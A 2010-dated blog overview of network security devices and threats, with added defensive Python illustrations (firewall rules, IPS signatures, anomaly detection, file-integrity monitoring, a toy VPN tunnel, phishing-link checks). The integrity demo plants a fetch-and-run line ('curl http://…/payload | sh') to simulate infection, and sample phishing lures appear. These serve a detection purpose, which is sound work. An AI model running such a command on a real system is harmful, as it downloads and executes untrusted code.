Thursday, April 22, 2010

Network Security

Network security covers a broad range of topics, and new solutions appear for new cases every day. Most businesses have security controls in place to keep their data safe. What follows is an overview of a few security devices and common threats that are part of everyday computing.

One of the most basic devices is a host-based firewall: a piece of software running on a single host that can restrict incoming and outgoing network activity for that host only. It can prevent the host from becoming infected and stop an infected host from spreading malware to other hosts. Host-based firewalls for servers typically use rule sets similar to those of network firewalls. Some host-based firewalls for desktops and laptops also use similar rule sets, but most allow or deny activity based on lists of applications. Activity involving any application not on the lists is either denied automatically, or permitted or denied on the basis of the user's response to a prompt asking for a decision about the activity. To prevent malware incidents, organizations should configure host-based firewalls with deny-by-default rule sets for incoming traffic, so that any inbound connection not explicitly permitted is blocked. A host-based firewall with antivirus capabilities can monitor inbound and outbound e-mail for signs of mass-mailing viruses or worms and temporarily shut off e-mail services if such activity is detected. Accordingly, host-based firewalls for workstations that offer several types of malware prevention capabilities typically provide the best single host-based technical control for malware threat mitigation, as long as they are configured properly and kept up to date at all times with the latest signatures and software updates.
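The two rule-set styles just described, port-based rules for a server and an application list for a desktop, both come down to "first matching rule wins, otherwise deny". The following Python is an added illustration of that evaluation logic, not code from the original post or from any firewall product; the rule sets, application names and connection events are constructed for the example.

```python
"""Deny-by-default host firewall evaluation (added illustration, stdlib only).
Rules, application names and sample events are constructed for this example."""
from __future__ import annotations
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Rule:
    action: str                  # "allow" or "deny"
    direction: str               # "in" (to this host) or "out" (from this host)
    proto: Optional[str] = None  # "tcp", "udp", or None for any protocol
    port: Optional[int] = None   # local port for "in", remote port for "out"; None for any
    app: Optional[str] = None    # owning executable, for application-based rule sets

    def matches(self, event: dict) -> bool:
        return (
            self.direction == event["direction"]
            and (self.proto is None or self.proto == event.get("proto"))
            and (self.port is None or self.port == event.get("port"))
            and (self.app is None or self.app == event.get("app"))
        )


def evaluate(rules: list[Rule], event: dict, default: str = "deny") -> str:
    """First matching rule wins. If nothing matches, the default applies; for
    incoming traffic that default should always be "deny"."""
    for rule in rules:
        if rule.matches(event):
            return rule.action
    return default


def evaluate_with_prompt(rules: list[Rule], event: dict, ask=None) -> str:
    """Desktop-style behaviour: an application not on the list is denied
    automatically, or decided by the user's answer when a prompt callback is given."""
    decision = evaluate(rules, event, default="unknown")
    if decision != "unknown":
        return decision
    return ask(event) if ask else "deny"


# Server-style rule set: expose only SSH and HTTPS and let the server talk out freely.
# Anything not listed, e.g. an inbound SMB connection from a worm, falls through to deny.
SERVER_RULES = [
    Rule("allow", "in", proto="tcp", port=22),
    Rule("allow", "in", proto="tcp", port=443),
    Rule("allow", "out"),
]

# Desktop-style rule set: a short list of applications that may open connections.
# A workstation serves nothing, so all inbound traffic is denied explicitly as well.
DESKTOP_RULES = [
    Rule("allow", "out", app="browser.exe"),
    Rule("allow", "out", app="mailclient.exe"),
    Rule("deny", "in"),
]


if __name__ == "__main__":
    for ev in (
        {"direction": "in", "proto": "tcp", "port": 443},
        {"direction": "in", "proto": "tcp", "port": 445},   # SMB: not listed, denied by default
        {"direction": "out", "proto": "tcp", "port": 25, "app": "dropper.exe"},
    ):
        print(ev, "server:", evaluate(SERVER_RULES, ev),
              "desktop:", evaluate_with_prompt(DESKTOP_RULES, ev))
```

The point to notice is that the worm's inbound SMB connection is blocked without any rule mentioning port 445: the protection comes from the default, which is why the rule set must be deny-by-default rather than a list of things to block.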

A network-based intrusion prevention system (IPS) is a program that performs packet sniffing and analyzes network traffic to identify and stop suspicious activity. It receives packets, analyzes them, decides whether they should be permitted, and allows acceptable packets to pass through. The network-based IPS architecture allows some attacks to be detected on networks before they reach their intended targets. Most network-based IPS products use a combination of attack signatures and analysis of network and application protocols, which means that they compare network activity for frequently attacked applications to expected behavior to identify potentially malicious activity. Network-based IPS products are used to detect many types of malicious activity besides malware, and typically can detect only a few instances of malware by default, such as recent major worms. However, some IPS products are highly customizable, allowing administrators to create and deploy attack signatures for many major new malware threats in a matter of minutes. Network-based IPS products can be effective at stopping specific known threats, such as network service worms, and e-mail-borne worms and viruses with easily recognizable characteristics. However, network-based IPS products are generally not capable of stopping malicious mobile code or Trojan horses. Network-based IPS products might be able to detect and stop some unknown threats through application protocol analysis.
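To make the two detection methods concrete, here is an added Python illustration (not code from the original post or from any IPS product) of an inspection function that first checks packets against attack signatures and then, for HTTP, against what a conforming client would send. The signatures, the HTTP conformance limits and the sample packets are constructed for the example.

```python
"""Network IPS inspection: attack signatures plus application-protocol analysis.
Added illustration; signatures, limits and packets are constructed."""
import re
from typing import List, NamedTuple, Optional, Tuple


class Packet(NamedTuple):
    src: str
    dst: str
    dport: int
    payload: bytes


class Signature(NamedTuple):
    name: str
    pattern: bytes
    dport: Optional[int] = None  # restrict to one service port, or None for any port


# Constructed signatures of the kind an administrator can deploy within minutes of a
# new worm appearing: a fixed byte string taken from its exploit traffic.
SIGNATURES = [
    Signature("demo-worm-nop-sled", b"\x90" * 8),                         # any port
    Signature("demo-ftp-probe", b"USER anonymous\r\nPASS hacker@", 21),    # FTP control only
]

HTTP_METHODS = {b"GET", b"POST", b"HEAD", b"PUT", b"DELETE", b"OPTIONS", b"PATCH"}
MAX_REQUEST_LINE = 2048
MAX_HEADER_LINE = 4096


def http_anomaly(payload: bytes) -> Optional[str]:
    """Compare a request on an HTTP port against what a conforming client sends.
    A deviation is not proof of an attack, but it is what lets an IPS stop an
    exploit that has no signature yet (e.g. an oversized request line)."""
    head = payload.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    request_line = lines[0]
    if len(request_line) > MAX_REQUEST_LINE:
        return "oversized request line"
    parts = request_line.split(b" ")
    if len(parts) != 3:
        return "malformed request line"
    method, _target, version = parts
    if method not in HTTP_METHODS:
        return f"unexpected method {method!r}"
    if not re.fullmatch(rb"HTTP/1\.[01]", version):
        return f"unexpected version {version!r}"
    for line in lines[1:]:
        if not line:
            continue
        if len(line) > MAX_HEADER_LINE:
            return "oversized header line"
        if b":" not in line:
            return "malformed header line"
    return None


def inspect(packet: Packet) -> Tuple[str, Optional[str]]:
    """Return ("allow", None) or ("drop", reason). Signatures are checked first,
    then protocol analysis for the services the IPS understands (here only HTTP)."""
    for sig in SIGNATURES:
        if (sig.dport is None or sig.dport == packet.dport) and sig.pattern in packet.payload:
            return "drop", f"signature {sig.name}"
    if packet.dport == 80 and packet.payload:
        reason = http_anomaly(packet.payload)
        if reason:
            return "drop", f"http anomaly: {reason}"
    return "allow", None


def inspect_all(packets: List[Packet]):
    return [inspect(p) for p in packets]


if __name__ == "__main__":
    sample = [
        Packet("10.0.0.5", "10.0.0.9", 80, b"GET /index.html HTTP/1.1\r\nHost: www.example.test\r\n\r\n"),
        Packet("10.0.0.5", "10.0.0.9", 80, b"GET /" + b"A" * 3000 + b" HTTP/1.1\r\nHost: x\r\n\r\n"),
        Packet("10.0.0.5", "10.0.0.9", 445, b"\x00\x01" + b"\x90" * 32 + b"\xcc"),
    ]
    for p, (verdict, why) in zip(sample, inspect_all(sample)):
        print(p.dport, verdict, why or "")
```

Note that the FTP signature is scoped to port 21: the same bytes on another port are ignored, which keeps false positives down but also means an attacker who moves the service to an unexpected port slips past it. That is the gap protocol analysis is meant to cover.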

A specialized form of network-based IPS, known as DDoS attack mitigation software, attempts to stop attacks by identifying unusual network traffic flows. Although these products are primarily intended to stop DDoS attacks against an organization, they can also be used to identify worm activity and other forms of malware, as well as use of attacker tools such as backdoors and e-mail generators. DDoS attack mitigation software typically works by monitoring normal network traffic patterns, including which hosts communicate with each other using which protocols, and the typical and peak volumes of activity, to establish baselines. The software then monitors network activity to identify significant deviations from the baselines. If malware causes a particularly high volume of network traffic or uses network or application protocols that are not typically seen, DDoS attack mitigation software should be able to detect and block the activity. Another way of limiting some malware incidents is by configuring network devices to limit the maximum amount of bandwidth that can be used by particular hosts or services. Also, some types of network monitoring software can detect and report significant deviations from expected network activity, although this software typically cannot specifically label the activity as malware-related or block it.
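The baseline-then-deviation approach described here, plus the per-host bandwidth cap mentioned at the end, can be shown in a few dozen lines. The Python below is an added illustration, not code from the original post or from any DDoS mitigation product; the flow records (who talks to whom, over what, and how many bytes per interval) are constructed sample data.

```python
"""Baseline-and-deviation detection as DDoS mitigation software performs it,
plus a per-host bandwidth cap. Added illustration; flow records are constructed."""
import statistics
from collections import defaultdict
from typing import Dict, List, Tuple

Flow = Tuple[str, str, str, int]   # (src host, dst host, protocol/port, bytes in interval)

# Five "normal" measurement intervals used to learn the baseline.
NORMAL_INTERVALS: List[List[Flow]] = [
    [("10.0.0.5", "10.0.0.9", "tcp/443", 50000), ("10.0.0.6", "10.0.0.9", "tcp/443", 30000), ("10.0.0.5", "10.0.0.7", "udp/53", 2000)],
    [("10.0.0.5", "10.0.0.9", "tcp/443", 52000), ("10.0.0.6", "10.0.0.9", "tcp/443", 29000), ("10.0.0.5", "10.0.0.7", "udp/53", 2100)],
    [("10.0.0.5", "10.0.0.9", "tcp/443", 48000), ("10.0.0.6", "10.0.0.9", "tcp/443", 31000), ("10.0.0.5", "10.0.0.7", "udp/53", 1900)],
    [("10.0.0.5", "10.0.0.9", "tcp/443", 51000), ("10.0.0.6", "10.0.0.9", "tcp/443", 30500), ("10.0.0.5", "10.0.0.7", "udp/53", 2050)],
    [("10.0.0.5", "10.0.0.9", "tcp/443", 49000), ("10.0.0.6", "10.0.0.9", "tcp/443", 29500), ("10.0.0.5", "10.0.0.7", "udp/53", 1950)],
]

# A later interval: one host floods its usual peer and starts hammering SMB on a new peer,
# the way a worm or a DDoS bot would.
SUSPECT_INTERVAL: List[Flow] = [
    ("10.0.0.5", "10.0.0.9", "tcp/443", 500000),
    ("10.0.0.6", "10.0.0.9", "tcp/443", 30000),
    ("10.0.0.5", "10.0.0.7", "udp/53", 2000),
    ("10.0.0.5", "10.0.0.8", "tcp/445", 800000),
]


def totals_by_key(flows: List[Flow]) -> Dict[Tuple[str, str, str], int]:
    totals = defaultdict(int)
    for src, dst, proto, nbytes in flows:
        totals[(src, dst, proto)] += nbytes
    return totals


def build_baseline(intervals: List[List[Flow]]):
    """Per (src, dst, protocol): mean, population stdev and peak bytes per interval.
    A pair that was silent in some interval counts as zero for that interval."""
    keys = {k for flows in intervals for k in totals_by_key(flows)}
    series = {k: [] for k in keys}
    for flows in intervals:
        totals = totals_by_key(flows)
        for k in keys:
            series[k].append(totals.get(k, 0))
    return {k: (statistics.fmean(s), statistics.pstdev(s), max(s)) for k, s in series.items()}


def detect(baseline, flows: List[Flow], k: float = 3.0, margin: float = 0.25, min_bytes: int = 1000):
    """Flag a flow that exceeds both mean + k*stdev and the historic peak by `margin`,
    and any host pair/protocol never seen while baselining. Tiny flows are ignored."""
    alerts = []
    for key, nbytes in totals_by_key(flows).items():
        if nbytes < min_bytes:
            continue
        if key not in baseline:
            alerts.append((key, nbytes, "never seen during baseline"))
            continue
        mean, stdev, peak = baseline[key]
        threshold = max(mean + k * stdev, peak) * (1 + margin)
        if nbytes > threshold:
            alerts.append((key, nbytes, f"volume {nbytes} exceeds threshold {threshold:.0f}"))
    return alerts


def apply_bandwidth_cap(flows: List[Flow], cap_bytes_per_host: int):
    """The cheaper control: per-source cap, returning (bytes passed, bytes dropped)."""
    used = defaultdict(int)
    for src, _dst, _proto, nbytes in flows:
        used[src] += nbytes
    return {src: (min(n, cap_bytes_per_host), max(0, n - cap_bytes_per_host)) for src, n in used.items()}


if __name__ == "__main__":
    baseline = build_baseline(NORMAL_INTERVALS)
    for key, nbytes, why in detect(baseline, SUSPECT_INTERVAL):
        print("ALERT", key, nbytes, why)
    print(apply_bandwidth_cap(SUSPECT_INTERVAL, 100000))
```

The bandwidth cap catches the flood without knowing anything about baselines, but as the paragraph says it cannot label the activity: it simply refuses to carry more than the cap, good traffic included. The baseline detector is what tells the operator which host pair and protocol changed.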

Host-based IPS products are similar in principle and purpose to network-based IPSs, except that a host-based IPS product monitors the characteristics of a single host and the events occurring within that host. Examples of activity that might be monitored by host-based IPSs include network traffic, system logs, running processes, file access and modification, and system and application configuration changes. Host-based IPS products often use a combination of attack signatures and knowledge of expected or typical behavior to identify known and unknown attacks on systems. For example, host-based IPS products that monitor attempted changes to files can be effective at detecting viruses attempting to infect files and Trojan horses attempting to replace files, as well as the use of attacker tools, such as rootkits, that often are delivered by malware. If a host-based IPS product monitors the host's network traffic, it offers detection capabilities similar to a network-based IPS's.
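File-access monitoring is the host-based IPS capability the paragraph singles out, so here is an added Python illustration of it (not code from the original post or from any host IPS product): hash a baseline of the files on the host, take a second snapshot later, and turn the differences into alerts. The directory tree, the simulated infection and the executable suffix list are constructed for the example.

```python
"""File-integrity monitoring as a host-based IPS performs it. Added illustration;
the directory tree and the simulated infection in demo() are constructed."""
import hashlib
import os
import stat
import tempfile

EXECUTABLE_SUFFIXES = (".exe", ".dll", ".sys", ".so", ".sh", ".bin")


def file_digest(path, chunk=65536):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(root):
    """{relative path: (sha256, permission bits)} for every regular file under root."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):      # skip symlinks, devices, sockets
                continue
            result[os.path.relpath(full, root)] = (file_digest(full), stat.S_IMODE(st.st_mode))
    return result


def compare(baseline, current):
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline.keys() & current.keys() if baseline[p] != current[p]),
    }


def alerts(changes, current):
    """Turn the raw diff into the events a host IPS would actually raise."""
    out = []
    for p in changes["modified"]:
        if p.endswith(EXECUTABLE_SUFFIXES):
            out.append(f"{p}: executable changed (virus infection or Trojan replacement?)")
    for p in changes["added"]:
        if p.endswith(EXECUTABLE_SUFFIXES):
            out.append(f"{p}: new executable appeared (dropped tool or rootkit component?)")
    for p in changes["added"] + changes["modified"]:
        if current[p][1] & (stat.S_ISUID | stat.S_ISGID):
            out.append(f"{p}: setuid/setgid bit set")
    return out


def demo():
    """Build a small tree, take a baseline, simulate an infection, and diff."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        os.makedirs(os.path.join(root, "etc"))
        app = os.path.join(root, "bin", "app.sh")
        with open(app, "w") as f:
            f.write("#!/bin/sh\necho hello\n")
        with open(os.path.join(root, "etc", "config.txt"), "w") as f:
            f.write("debug=0\n")
        baseline = snapshot(root)

        # Simulated malware: append to an existing executable, drop a new shared
        # object, and mark the dropped file setuid.
        with open(app, "a") as f:
            f.write("curl http://198.51.100.1/payload | sh\n")
        dropped = os.path.join(root, "bin", "rootkit.so")
        with open(dropped, "wb") as f:
            f.write(b"\x7fELF-constructed")
        os.chmod(dropped, 0o4755)

        current = snapshot(root)
        changes = compare(baseline, current)
        return changes, alerts(changes, current)


if __name__ == "__main__":
    changes, found = demo()
    print(changes)
    for line in found:
        print("ALERT:", line)
```

In a real deployment the baseline itself is the target a rootkit goes after, so it must be stored where the monitored host cannot rewrite it (read-only media or another host), and a snapshot taken on an already-infected machine is worthless as a baseline.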

A virus requires its host program to run before the virus can become active, and generally requires human interaction to activate. The virus "infects" computer files, usually executable programs, by inserting a copy of itself into the file. These copies are usually executed when the infected file is loaded into memory, allowing the virus to infect other files. A virus may carry nothing more than a simple message or image that consumes storage space and memory and degrades the overall performance of a computer, or, in the case of a more malicious payload, it can destroy files, reformat a hard drive (erasing all of the data on the disk), or cause other damage. Worms are also self-propagating, but unlike viruses they create fully functional copies and execute themselves without user intervention. This has made worms increasingly popular with attackers, because a worm can infect many more systems in a short period of time than a virus can. Worms take advantage of known vulnerabilities and configuration weaknesses, such as unsecured Windows shares. Although some worms are intended mainly to waste system and network resources, many worms damage systems by installing backdoors, performing DDoS attacks against other hosts, or performing other malicious acts. A Trojan horse, once delivered to its host and executed, might be activated at any time, either by remote control, by a timer mechanism, or on detecting certain events on the host. A Trojan horse may enter a user's computer by presenting itself as an attractive tool of some sort, which the user intentionally downloads and installs, unaware of its ulterior purpose. Trojan horses often include keylogging and other spyware functionality, along with a range of functions for disabling system security.

A VPN works by using shared public networks while maintaining privacy through security procedures and protocols that encrypt communications between two end points. To provide an additional level of security, a VPN can encrypt not only the data, but also the originating and receiving network addresses. There are two main VPN technologies, which differ in their methods of encrypting data for secure transmission over Internet connections. The first method is based on tunneling protocols that encrypt packets at the sending end and decrypt them at the receiving end. This process is commonly referred to as encapsulation, because the original, unsecured packet is placed within another packet that has been secured by encryption. The encapsulated packets are then sent through a "tunnel" that cannot be traversed by data that has not been properly encapsulated and encrypted.
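The following Python is an added illustration of tunnel-mode encapsulation as described above: the original packet, including its source and destination addresses, is encrypted and authenticated, then wrapped in an outer packet that carries only the two gateway addresses. It is not code from the original post and not any real VPN protocol. To stay dependency-free it builds its cipher from HMAC-SHA256 in counter mode with an encrypt-then-MAC tag; a production tunnel (IPsec ESP, WireGuard) uses a standard AEAD such as AES-GCM or ChaCha20-Poly1305 instead. The gateway and host addresses, the SPI values and the shared secret are constructed.

```python
"""Tunnel-mode encapsulation with authentication and anti-replay (added illustration,
stdlib only, not a real VPN protocol). Addresses, SPIs and the secret are constructed."""
import hashlib
import hmac
import ipaddress
import struct

HEADER_LEN = 16   # outer src (4) + outer dst (4) + SPI (4) + sequence (4)
TAG_LEN = 32
SHARED_SECRET = b"constructed-demo-secret; a real tunnel negotiates this in a handshake"


def derive_keys(secret, spi):
    """Separate encryption and MAC keys per security association (per SPI), so the
    two directions of the tunnel never reuse a keystream."""
    label = struct.pack(">I", spi)
    enc = hmac.new(secret, b"tunnel-encrypt" + label, hashlib.sha256).digest()
    mac = hmac.new(secret, b"tunnel-auth" + label, hashlib.sha256).digest()
    return enc, mac


def keystream(enc_key, nonce, length):
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(enc_key, nonce + struct.pack(">I", counter), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def pack_addrs(src, dst):
    return ipaddress.IPv4Address(src).packed + ipaddress.IPv4Address(dst).packed


def unpack_addrs(data):
    return str(ipaddress.IPv4Address(data[:4])), str(ipaddress.IPv4Address(data[4:8]))


def visible_fields(outer):
    """What an observer on the public network can read: gateways, SPI, sequence."""
    src, dst = unpack_addrs(outer[:8])
    spi, seq = struct.unpack(">II", outer[8:16])
    return src, dst, spi, seq


class Tunnel:
    def __init__(self, secret, local_gw, remote_gw, spi_out, spi_in):
        self.local_gw, self.remote_gw = local_gw, remote_gw
        self.spi_in = spi_in
        self.spi_out = spi_out
        self.tx_enc, self.tx_mac = derive_keys(secret, spi_out)
        self.rx_enc, self.rx_mac = derive_keys(secret, spi_in)
        self.send_seq = 0
        self.last_recv_seq = 0

    def encapsulate(self, inner_src, inner_dst, payload):
        self.send_seq += 1
        nonce = struct.pack(">II", self.spi_out, self.send_seq)   # unique per packet per SA
        header = pack_addrs(self.local_gw, self.remote_gw) + nonce
        inner = pack_addrs(inner_src, inner_dst) + payload          # the whole original packet
        body = xor(inner, keystream(self.tx_enc, nonce, len(inner)))
        tag = hmac.new(self.tx_mac, header + body, hashlib.sha256).digest()
        return header + body + tag

    def decapsulate(self, outer):
        if len(outer) < HEADER_LEN + 8 + TAG_LEN:
            raise ValueError("truncated packet dropped")
        header, body, tag = outer[:HEADER_LEN], outer[HEADER_LEN:-TAG_LEN], outer[-TAG_LEN:]
        expected = hmac.new(self.rx_mac, header + body, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):
            raise ValueError("authentication failed; packet dropped")   # tampered or wrong key
        spi, seq = struct.unpack(">II", header[8:16])
        if spi != self.spi_in:
            raise ValueError("unknown SPI; packet dropped")
        if seq <= self.last_recv_seq:
            raise ValueError("replayed packet dropped")
        self.last_recv_seq = seq
        inner = xor(body, keystream(self.rx_enc, header[8:16], len(body)))
        src, dst = unpack_addrs(inner[:8])
        return src, dst, inner[8:]


def rejected(tunnel, outer):
    """True if the receiving gateway drops the packet."""
    try:
        tunnel.decapsulate(outer)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    site_a = Tunnel(SHARED_SECRET, "203.0.113.1", "198.51.100.1", spi_out=0x1001, spi_in=0x2002)
    site_b = Tunnel(SHARED_SECRET, "198.51.100.1", "203.0.113.1", spi_out=0x2002, spi_in=0x1001)
    outer = site_a.encapsulate("192.168.1.10", "10.20.0.5", b"hello from site A")
    print("on the wire:", visible_fields(outer))          # only gateway addresses are visible
    print("at site B:", site_b.decapsulate(outer))        # original addresses and payload recovered
    print("replay dropped:", rejected(site_b, outer))
```

Two details carry the security properties the paragraph claims. The inner addresses are inside the encrypted body, so the public network sees only gateway-to-gateway traffic. And the tag is checked before anything is decrypted, so a packet that was not produced by the other gateway (forged, tampered with, or replayed) never enters the tunnel.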

Phishing refers to a social engineering attack in which someone misrepresents their identity or authority in order to induce another person to provide personally identifiable information over the Internet. Internet scammers use e-mail bait to "phish" for passwords and personal financial data from the "sea" of Internet users. Some common phishing scams involve e-mails that purport to be from a financial institution, Internet service provider, or other trusted company, claiming that a person's records have been lost or their account compromised. The e-mail directs the person to a website that mimics the legitimate business's website and asks the person to enter a credit card number so the records or account can be restored. In fact, the e-mail and website are controlled by a third party who is attempting to extract information that will be used in identity theft or other crimes.
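The give-away in the scam described above is almost always the link: its visible text names the trusted company while its real target is somewhere else. The Python below is an added illustration (not code from the original post or from any mail product) of the checks a mail gateway or client can run on an HTML message to catch that pattern. The two sample messages, the bank and all domains are constructed.

```python
"""Link checks for phishing lures in an HTML message (added illustration).
The sample messages and all domains are constructed; the bank is fictitious."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) for every <a> element."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_domain(host):
    """Last two labels; an approximation. Real code should consult the Public Suffix List."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


DOMAIN_IN_TEXT = re.compile(r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})")
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def analyze(html, sender_domain):
    """Return [(href, [reasons])] for links that look like phishing lures."""
    parser = LinkExtractor()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        url = urlparse(href)
        host = url.hostname or ""
        reasons = []
        if url.scheme != "https":
            reasons.append(f"not https ({url.scheme or 'relative'})")
        if IPV4.fullmatch(host):
            reasons.append("raw IP address instead of a hostname")
        if "@" in url.netloc:
            reasons.append("user-info before @ hides the real host")
        shown = DOMAIN_IN_TEXT.search(text.lower())
        if shown and registrable_domain(shown.group(1)) != registrable_domain(host):
            reasons.append(f"text shows {shown.group(1)} but link goes to {host}")
        if registrable_domain(host) != registrable_domain(sender_domain):
            reasons.append(f"link domain {registrable_domain(host)} differs from sender domain {sender_domain}")
        if reasons:
            findings.append((href, reasons))
    return findings


# Constructed sample messages.
PHISHING_MESSAGE = """
<p>Dear customer, your account records have been lost. Restore access now:</p>
<a href="http://examplebank.test.account-restore.example/login">https://www.examplebank.test/login</a>
<p>Or verify your card here: <a href="http://examplebank.test@203.0.113.7/verify">Verify now</a></p>
"""
LEGITIMATE_MESSAGE = """
<p>Your statement is ready. Sign in at <a href="https://www.examplebank.test/statements">examplebank.test</a>.</p>
"""

if __name__ == "__main__":
    for href, reasons in analyze(PHISHING_MESSAGE, "examplebank.test"):
        print(href)
        for r in reasons:
            print("  -", r)
    print("legitimate message findings:", analyze(LEGITIMATE_MESSAGE, "examplebank.test"))
```

The first lure is the classic one: the hostname begins with the bank's name, but the registrable domain is `account-restore.example`. The second hides a raw IP address behind user-info in the URL. Neither check proves fraud on its own, which is why the function returns reasons rather than a verdict and leaves the decision to policy.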

Phishing is one form of social engineering, which more broadly refers to techniques designed to fool human beings into providing information or taking an action that leads to a subsequent breach of information systems security. Humans are a weak link in the security chain, and this has been exploited by criminals in both the physical and cyber worlds. E-mail, web browsers, and instant messaging applications are some of the more commonly used communication channels for delivering social engineering attacks.
